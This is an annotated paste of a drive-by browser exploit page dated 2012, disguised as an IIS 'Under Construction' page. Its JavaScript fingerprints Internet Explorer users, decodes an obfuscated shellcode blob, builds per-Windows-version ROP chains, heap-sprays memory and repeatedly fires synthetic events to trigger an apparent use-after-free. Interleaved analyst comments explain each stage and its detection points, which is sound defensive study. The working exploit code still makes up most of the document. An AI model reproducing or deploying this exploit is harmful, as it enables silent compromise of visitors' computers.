
Untitled

a guest
Jun 13th, 2012
  1. Hax0rFunT1me !!
  2.  
  3.  
  4. <HTML>
  5. <head>
  6. <meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
  7.  
  8.  
  9. <title ID=titletext>Under Construction</title>
  10. </head>
  11. <SCRIPT LANGUAGE="JavaScript">
  12.  
  // Analyst note: client-side fingerprinting helper. The constructor defines
  // numeric codes for Windows releases and UI languages, plus three probes
  // that read only `navigator` properties (no network or DOM access).
  // ManAndWoman() uses platform() and tarLanguage() to choose between sets of
  // hard-coded addresses. OS/language branching of this kind, sitting next to
  // large string construction, is a useful triage indicator for a
  // drive-by page.
  13. function FINGERPRINT_IE()
  14. {
  // Operating-system codes returned by platform().
  15. this.UNKNOWN = -1;
  16. this.WINDOWS_XP = 1;
  17. this.WINDOWS_2003 = 2;
  18. this.WINDOWS_VISTA = 3;
  19. this.WINDOWS_7 = 4;
  20.  
  // UI-language codes returned by tarLanguage().
  21. this.EN=5;
  22. this.ZH=6;
  23. this.FR=7;
  24. this.DE=8;
  25. this.JA=9;
  26. this.PT=10;
  27. this.KO=11;
  28. this.RU=12;
  29.  
  // Returns true only when both appName and the user-agent string identify
  // Internet Explorer. Defined here but not called anywhere in this paste.
  30. this.isie = function()
  31. {
  32. if( navigator.appName != 'Microsoft Internet Explorer' || navigator.userAgent.indexOf( 'MSIE' ) < 0 )
  33. return false;
  34. return true;
  35. };
  36.  
  // Maps the "Windows NT x.y" token in the user-agent string to one of the
  // OS codes above; anything else yields UNKNOWN.
  37. this.platform = function()
  38. {
  39. if( navigator.userAgent.indexOf( 'Windows NT 5.1' ) > -1 )
  40. return this.WINDOWS_XP;
  41. else if( navigator.userAgent.indexOf( 'Windows NT 5.2' ) > -1 )
  42. return this.WINDOWS_2003;
  43. else if( navigator.userAgent.indexOf( 'Windows NT 6.0' ) > -1 )
  44. return this.WINDOWS_VISTA;
  45. else if( navigator.userAgent.indexOf( 'Windows NT 6.1' ) > -1 )
  46. return this.WINDOWS_7;
  47. return this.UNKNOWN;
  48. };
  49.  
  // Maps the browser language string to one of the language codes. The
  // match is a substring test, checked in the order written below.
  50. this.tarLanguage=function()
  51. {
  52. var language;
  // navigator.language on Netscape-identified browsers, otherwise the
  // IE-specific navigator.browserLanguage.
  53. if(navigator.appName=='Netscape')
  54. language=navigator.language;
  55. else
  56. language=navigator.browserLanguage;
  57.  
  58. if(language.indexOf('en')>-1)
  59. return this.EN;
  60. else if(language.indexOf('zh')>-1)
  61. return this.ZH;
  62. else if (language.indexOf('fr') > -1)
  63. return this.FR;
  64. else if (language.indexOf('de') > -1)
  65. return this.DE;
  66. else if (language.indexOf('ja') > -1)
  67. return this.JA;
  68. else if (language.indexOf('pt') > -1)
  69. return this.PT;
  70. else if(language.indexOf('ko') > -1)
  71. return this.KO;
  72. else if(language.indexOf('ru') > -1)
  73. return this.RU;
  // Unlisted language: shows the raw language string in an alert box and
  // returns alert()'s result (undefined). A visitor would see this pop-up.
  74. else
  75. return alert(language);
  76.  
  77. };
  78. }
  79.  
  // Analyst note: string-repeat helper. Doubles `str` until it is at least
  // `length` characters long, then returns the final `length` characters.
  // Not called anywhere in this paste.
  80. function dup_str(str, length) {
  81. var res = str;
  82. while(res.length < length) {
  83. res += res;
  84. }
  // substr(start) with start = res.length - length keeps the tail.
  85. res = res.substr(res.length - length);
  86. return res;
  87. }
  88.  
  // Analyst note: hex-text to binary-string converter. Consumes the input
  // four hex characters at a time, swaps the two character pairs, prefixes
  // "%u", and finally unescape()s the result so each group becomes one
  // UTF-16 code unit. Not called anywhere in this paste.
  89. function to_bin(str) {
  90. var res = "";
  91. while(str.length > 0) {
  92. var first = str.substr(0, 2);
  93. var second = str.substr(2, 2);
  // Pair order is reversed ("second" before "first") when building %uXXXX.
  94. res += "%u" + second + first;
  95. str = (str.length > 4) ? str.substr(4) : "";
  96. }
  97. return unescape(res);
  98. }
  // Analyst note: global array filled by ManAndWoman(). Being global, it keeps
  // a reference to every stored string for the lifetime of the page.
  99. var arr=[];
  // Analyst note: payload-staging routine, called once at page load. It
  // (1) fingerprints OS and UI language, (2) decodes an embedded binary blob,
  // (3) assembles a platform-specific table of hard-coded addresses, and
  // (4) fills the global `arr` with several hundred identical strings of about
  // 512 KB each (a heap spray). Nothing in this function touches the DOM; the
  // DOM manipulation lives in OnTest() and triggerFunc().
  // Defensive relevance: every address below is a constant, so the table is
  // only meaningful where the referenced modules load at the expected base.
  // ASLR-enabled modules or a different module build should invalidate it.
  // The burst of large, identical string allocations is a practical
  // behavioural detection point.
  100. function ManAndWoman()
  101. {
  102. var ie=new FINGERPRINT_IE();
  103. var platform = ie.platform();
  104. var tarLanguage=ie.tarLanguage();
  105.  
  // Three raw dwords that are appended after the address table. The name
  // suggests a stack-pointer fix-up stub.
  // NOTE(review): not disassembled for this annotation; confirm.
  106. var adjustEsp= dword2data(0x645b186a)+
  107. dword2data(0x638b1b8b)+
  108. dword2data(0x9090fc08);
  109.  
  // Encoded binary blob. "NewYoukv" stands in for "%u", so the familiar
  // %uXXXX escape pattern never appears literally in the page source.
  // Scanners need to normalise this substitution before signature matching.
  // NOTE(review): the blob was not decoded for this annotation. Extract any
  // network indicators it carries in an isolated analysis environment.
  110. var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+
  111. "NewYoukv21B0NewYoukv1111NewYoukv9A11NewYoukv1D51NewYoukv619ANewYoukvBC0DNewYoukv799ANewYoukv9A19NewYoukv7BE6NewYoukv4817NewYoukvB3F9NewYoukv1111NewYoukvF311NewYoukv51E8NewYoukv2991"+
  112. "NewYoukv64D2NewYoukv98EBNewYoukv0D57NewYoukv7E79NewYoukv117FNewYoukv7911NewYoukv6364NewYoukv7C7DNewYoukvCD9ANewYoukv01FANewYoukvEE42NewYoukv0D67NewYoukvEE9ANewYoukv9A44NewYoukv9AFD"+
  113. "NewYoukv9C07NewYoukv1443NewYoukvF3EENewYoukvFAF9NewYoukvEEEENewYoukv4BEENewYoukv444BNewYoukvF99ANewYoukv7BF9NewYoukv1111NewYoukv4C11NewYoukvFD90NewYoukv1011NewYoukv1111NewYoukvCD9A"+
  114. "NewYoukv7942NewYoukv1011NewYoukv1111NewYoukv47EENewYoukv9815NewYoukv314FNewYoukv15D6NewYoukv7D12NewYoukv767ENewYoukvD63FNewYoukv1255NewYoukv7615NewYoukv7778NewYoukv2211NewYoukv41D1"+
  115. "NewYoukv4241NewYoukvC79ANewYoukvD392NewYoukv4339NewYoukvEE41NewYoukv0947NewYoukvD122NewYoukv05FANewYoukvEE41NewYoukv3167NewYoukv67EENewYoukv9A0DNewYoukv44EENewYoukvFD9ANewYoukv479A"+
  116. "NewYoukv9C19NewYoukv1443NewYoukvF3EENewYoukvF6F9NewYoukvEEEENewYoukv79EENewYoukv12F9NewYoukv1111NewYoukv47EENewYoukvEE01NewYoukv3167NewYoukv47EENewYoukv901DNewYoukv15D5NewYoukv1113"+
  117. "NewYoukv2211NewYoukv40D8NewYoukv47EENewYoukv4005NewYoukv9A47NewYoukv2D64NewYoukv659ANewYoukv693FNewYoukvE412NewYoukv9A47NewYoukv3167NewYoukvE412NewYoukvD822NewYoukv5058NewYoukv12BC"+
  118. "NewYoukv22D4NewYoukv1ECANewYoukv01AFNewYoukvC72BNewYoukv1965NewYoukvDAD0NewYoukv121CNewYoukv51CBNewYoukvE0FANewYoukv0E2ANewYoukvF664NewYoukv9A4FNewYoukv354FNewYoukvCC12NewYoukv9A77"+
  119. "NewYoukv5A1DNewYoukv4F9ANewYoukv120DNewYoukv9ACCNewYoukv9A15NewYoukvD412NewYoukv4FBANewYoukvD248NewYoukvE8F9NewYoukvEEEFNewYoukv9FEENewYoukv1F5FNewYoukv22FDNewYoukv9BDBNewYoukv894A"+
  120. "NewYoukv9BEFNewYoukv341FNewYoukvEEA1NewYoukvA1D3NewYoukv3C58NewYoukv6FCANewYoukvF3C9NewYoukv2762NewYoukv3E0BNewYoukv2061NewYoukv2223NewYoukv2425NewYoukv2627NewYoukv2829NewYoukv1121NewYoukv7911NewYoukv6565NewYoukv2B61NewYoukv3E3ENewYoukv2020NewYoukv3F22NewYoukv2120NewYoukv233FNewYoukv2025NewYoukv233FNewYoukv2822NewYoukv7B3ENewYoukv6770NewYoukv6670NewYoukv743FNewYoukv7469NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111");
  121.  
  // Restore the "%u" escapes, then unescape() turns each %uXXXX group into
  // one UTF-16 code unit, giving a binary string.
  122. var xbc=vbc.replace(/NewYoukv/g,"%u");
  123.  
  124. var gjb=unescape(xbc);
  125.  
  126. var rop_stack="";
  127.  
  128.  
  // Windows Vista / 7 branch: sixteen constants, thirteen of them in the
  // 0x7c34xxxx-0x7c37xxxx range. The paste does not name the module they
  // point into. The small literals 0x1, 0x1000 and 0x40 are consistent with
  // arguments to a memory-protection change (0x40 is PAGE_EXECUTE_READWRITE
  // on Windows), presumably a DEP bypass. TODO confirm.
  129. if( platform == ie.WINDOWS_7 || platform == ie.WINDOWS_VISTA)
  130. {
  131. rop_stack= dword2data(0x7c34bc93)+
  132. dword2data(0x7c34bc93)+
  133. dword2data(0x7c343860)+
  134. dword2data(0x00000001)+
  135. dword2data(0x7c344efe)+
  136. dword2data(0x00001000)+
  137. dword2data(0x7c35f1fb)+
  138. dword2data(0x00000040)+
  139. dword2data(0x7c341137)+
  140. dword2data(0x7c346c0b)+
  141. dword2data(0x7c36277b)+
  142. dword2data(0x7c3415a2)+
  143. dword2data(0x7c373b3d)+
  144.  
  145. dword2data(0x7c37a0a5)+
  146. dword2data(0x7c378c81)+
  147. dword2data(0x7c345c30);
  148.  
  // Pad with 0x90909090 until the string holds at least 0x6c/2 = 54 UTF-16
  // units (0x6c bytes), then append two more dwords.
  149. while(rop_stack.length < (0x6c/2))
  150. {
  151. rop_stack+=dword2data(0x90909090);
  152. }
  153. rop_stack+=dword2data(0x04eb9090);
  154. rop_stack+=dword2data(0x7c348b05);
  155.  
  156. }
  // Windows XP branch: addresses are computed as module base + offset. The
  // module names (iertutil.dll, kernel32.dll) come from the paste's own
  // comments. The iertutil.dll base is hard-coded per UI language; only the
  // Korean case also overrides kernelBase.
  157. else if( platform == ie.WINDOWS_XP )
  158. {
  159. var dllBase;//iertutil.dll
  160.  
  161. var insOff=0xFD5A8;
  162. var insOff2=0xBA108;
  163.  
  164. var kernelBase=0x7c800000;//kernel32.dll
  165.  
  166. var kerOff1=0x7BF37;
  167. var kerOff2=0x9AF1;
  168. var kerOff3=0xE034;
  169. var kerOff4=0x7F436;
  170. var kerOff5=0x36A08;
  171. var kerOff6=0x6CFC3;
  172. var kerOff7=0x1BC81;
  173.  
  174. if(tarLanguage == ie.EN)
  175. {
  176. dllBase=0x3dfd0000;
  177. }
  178. else if(tarLanguage == ie.ZH)
  179. {
  180. dllBase=0x3eab0000;
  181. }
  182. else if(tarLanguage == ie.JA)
  183. {
  184. dllBase=0x40930000;
  185. }
  186. else if(tarLanguage == ie.KO)
  187. {
  188. dllBase=0x3f8d0000;
  189. kernelBase=0x7c7d0000;
  190. }
  191. else if(tarLanguage == ie.DE)
  192. {
  193. dllBase=0x40f50000;
  194. }
  195. else if(tarLanguage == ie.FR)
  196. {
  197. dllBase=0x40b40000;
  198. }
  199. else if(tarLanguage == ie.RU)
  200. {
  201. dllBase=0x40080000;
  202. }
  203. else if(tarLanguage == ie.PT)
  204. {
  205. dllBase=0x400f0000;
  206. }
  // Same shape as the Vista/7 table: computed addresses interleaved with
  // the literals 0x40, 0x1 and 0x1000.
  207. rop_stack= dword2data(kernelBase+kerOff1)+
  208. dword2data(kernelBase+kerOff2)+
  209. dword2data(kernelBase+kerOff3)+
  210. dword2data(0x00000040)+
  211. dword2data(0x00000001)+
  212. dword2data(kernelBase+kerOff4)+
  213. dword2data(0x41414141)+
  214.  
  215. dword2data(0x00001000)+
  216. dword2data(0x90909090)+
  217. dword2data(kernelBase+kerOff5)+
  218. dword2data(kernelBase+kerOff6)+
  219. dword2data(kernelBase+kerOff7)+
  220. dword2data(dllBase+insOff);
  221.  
  222.  
  223. while(rop_stack.length < (0x6c/2))
  224. {
  225. rop_stack+=dword2data(0x90909090);
  226. }
  227. rop_stack+=dword2data(0x04eb9090);
  228. rop_stack+=dword2data(dllBase+insOff2);
  229. }
  230.  
  // WINDOWS_2003 and UNKNOWN match neither branch, so rop_stack is still
  // empty at this point. The stub and the decoded blob are appended
  // regardless of platform.
  231. rop_stack+=adjustEsp;
  232. rop_stack+=gjb;
  // Nine 0xDEADBEEx marker dwords placed at the start of each block. They
  // read as placeholders or landmarks; their runtime role is not visible in
  // this paste.
  233. var memory_layout= dword2data(0xDEADBEE1)+
  234. dword2data(0xDEADBEE2)+
  235. dword2data(0xDEADBEE3)+
  236. dword2data(0xDEADBEE4)+
  237. dword2data(0xDEADBEE5)+
  238. dword2data(0xDEADBEE6)+
  239. dword2data(0xDEADBEE7)+
  240. dword2data(0xDEADBEE8)+
  241. dword2data(0xDEADBEE9);
  242.  
  243. var code=rop_stack;
  // The literal is split as '%u9'+'090' so "%u9090" never appears contiguous
  // in the source, which defeats naive string signatures. The filler is
  // doubled until it holds at least 0x80000 units.
  244. var nops=unescape('%u9'+'090'+'%u9'+'090');
  245. while(nops.length < 0x80000)
  246. {
  247. nops+=nops;
  248. }
  // One 0x800-unit pattern: markers, filler so that `code` starts at unit
  // offset 0x5f4, `code` itself, then filler up to 0x800 units.
  249. var offset=nops.substring(0,0x5f4-memory_layout.length);
  250. var blockItem=memory_layout+offset+code+nops.substring(0,0x800-0x5f4-code.length);
  // Double the pattern until it reaches 0x40000 units, then cut it to
  // (0x80000-6)/2 = 262141 units, just under 512 KB of UTF-16 data.
  251. while(blockItem.length < 0x40000)
  252. {
  253. blockItem+=blockItem;
  254. }
  255. var block_shell=blockItem.substring(0,(0x80000-6)/2);
  256.  
  257.  
  // Store 449 entries (indices 1..0x1c1) in the global array, roughly 225 MB
  // in total if each entry is a separate allocation. substring(0, length)
  // presumably forces a distinct copy per slot rather than a shared
  // reference; confirm for the script engine in question.
  258. for(var i=1;i<0x1c2;++i)
  259. {
  260. arr[i]=block_shell.substring(0,block_shell.length);
  261. }
  262. }
  263.  
  264.  
  265. </SCRIPT>
  266. <BODY>
  267.  
  268.  
  <!-- Analyst note: trigger markup. The hidden img and the 3000x4000 white
       div both carry id "imgTest". The anchor's href and onClick call
       OnTest(), and the inner div's mouse handlers call OnTest2(). OnTest()
       rewrites the innerHTML of the enclosing container "testfaild", so the
       handler replaces the very elements it was invoked from. Duplicate ids
       combined with self-rewriting handlers are worth flagging in review. -->
  269. <DIV id=testfaild>
  270. <img id="imgTest" style="display:none">
  271. <a href="javascript:OnTest();" id="MyA" onClick="OnTest();">
  272. <div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div>
  273. </a>
  274. </DIV>
  275. <SCRIPT LANGUAGE="JavaScript">
  276.  
  // Analyst note: packs a 32-bit number into a two-character string. The
  // value is rendered as 8 zero-padded hex digits and emitted low word first,
  // then high word, as two %uXXXX escapes passed through unescape().
  // It is defined in the second script block but used by ManAndWoman() in the
  // first; that works because ManAndWoman() is only invoked at the end of
  // this second block.
  277. function dword2data( dword )
  278. {
  279. var d = Number( dword ).toString( 16 );
  280. while( d.length < 8 )
  281. d = '0' + d;
  // substr(4, 8) asks for 8 characters from index 4, but only 4 remain, so
  // it yields the low four hex digits.
  282. return unescape( '%u' + d.substr( 4, 8 ) + '%u' + d.substr( 0, 4 ) );
  283. }
  284.  
  // Analyst note: click handler for the anchor "MyA" (href and onClick).
  // It allocates 128 detached div elements, re-assigns the container's
  // innerHTML to itself, and then sets className on four of the new divs to
  // a crafted string.
  // NOTE(review): the sequence reads as a use-after-free pattern, with the
  // className strings presumably intended to occupy memory released by the
  // innerHTML rewrite. Confirm under a debugger in an isolated environment.
  // The mitigation is a fully patched browser; nothing here is specific to a
  // site or user.
  285. function OnTest()
  286. {
  // 0x0c0c0c0c is the value encoded into the first two code units of the
  // string below; the remaining characters are literal filler text.
  287. var tag=0x0c0c0c0c;
  288. var vtable1 = dword2data( tag ) + '1234567555555555588888888';
  289.  
  290. var divs = new Array();
  291. for( var i=0 ; i<128; i++ )
  292. divs.push( document.createElement( 'div' ) );
  // The Math.atan2 calls with a string argument change no page state.
  // Presumably they are leftover debugging markers; confirm.
  293. Math.atan2(0xbabe,"trigger before!!!");
  // Self-assignment re-serialises and re-parses the container's markup, so
  // the elements inside "testfaild" are torn down and rebuilt while this
  // handler, invoked from one of them, is still running.
  294. testfaild.innerHTML = testfaild.innerHTML;
  295. Math.atan2(0xbabe,"trigger before 222!!!");
  296.  
  297. divs[0].className = vtable1;
  298. divs[1].className = vtable1;
  299. divs[2].className = vtable1;
  300. divs[3].className = vtable1;
  301. }
  302.  
  // Analyst note: mouseover/mouseout handler for the inner div. It resolves
  // the name "imgTest" through eval() and sets `src` to an empty string on
  // whatever that resolves to. Two elements in this page share that id, so
  // what the lookup returns depends on the browser's handling of duplicate
  // ids. TODO confirm for the targeted browser.
  303. function OnTest2()
  304. {
  305. eval("imgTest").src="";
  306. }
  307.  
  // Analyst note: timer-driven event pump. On each run it synthesises the
  // user interaction that the handlers above are bound to, then re-arms
  // itself, so no real click or mouse movement is needed. Script-generated
  // events firing on a one-second loop are a behavioural indicator.
  308. function triggerFunc()
  309. {
  310.  
  // x is the live list of div elements in document order. In this page
  // x[0] is the container "testfaild" and x[1] is the inner div with the
  // mouse handlers.
  311. var x=document.getElementsByTagName("div");
  312.  
  313. var fireOnThis=document.getElementById("MyA");
  // Standards-DOM branch: attempts to build a MouseEvents object and
  // dispatch it at the anchor. evObj is assigned without `var`, so it is an
  // implicit global.
  314. if(document.createEvent)
  315. {
  316.  
  317.  
  318.  
  319. evObj=document.createEvent('MouseEvents');
  320. evObj.iniEvent('click',true,false);
  321. fireOnThis.dispatchEvent(evObj);
  322.  
  323. }
  // Legacy Internet Explorer branch: fires mouseover on the inner div,
  // click on the anchor, then mouseout on the inner div, which reaches
  // OnTest2(), OnTest() and OnTest2() in that order.
  324. else if(document.createEventObject)
  325. {
  326. x[1].fireEvent('onMouseOver');
  327.  
  328. fireOnThis.fireEvent('onclick');
  329.  
  330. x[1].fireEvent('onMouseOut');
  331. }
  332.  
  // String-argument setTimeout is evaluated as code and re-schedules this
  // function every 1000 ms.
  333. setTimeout("triggerFunc();",1000);
  334. }
  // Analyst note: page-load sequence. The first event pump run is scheduled
  // one second out, and ManAndWoman() runs synchronously right away, so the
  // large string allocations are in place before any synthetic event fires.
  335. setTimeout("triggerFunc();",1000);
  336. ManAndWoman();
  337.  
  338. </SCRIPT>
  339.  
  340.  
  341.  
  342.  
  343. <body bgcolor=white>
  344. <table>
  345. <tr>
  346. <td ID=tableProps width=70 valign=top align=center>
  347. <img ID=pagerrorImg src="pagerror.gif" width=36 height=48>
  348. <td ID=tablePropsWidth width=400>
  349.  
  350. <h1 ID=errortype style="font:14pt/16pt verdana; color:#4e4e4e">
  351. <P ID=Comment1><!--Problem--><P ID="errorText">Under Construction</h1>
  352.  
  353. <P ID=Comment2><!--Probable causes:<--><P ID="errordesc"><font style="font:9pt/12pt verdana; color:black">
  354. The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured.
  355. <P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator.
  356.  
  357. <hr size=1 color="blue">
  358.  
  359. <P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help.
  360.  
  361. <h5 ID=head1>To access IIS Help</h5>
  362. <ol>
  363. <li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>.
  364. <li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears.
  365. <li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>.
  366. <li ID=bullet4>Click <b>Internet Information Services</b>.</ol>
  367. </td>
  368. </tr>
  369. </table>
  370.  
  371.  
  372. </BODY>
  373. </HTML>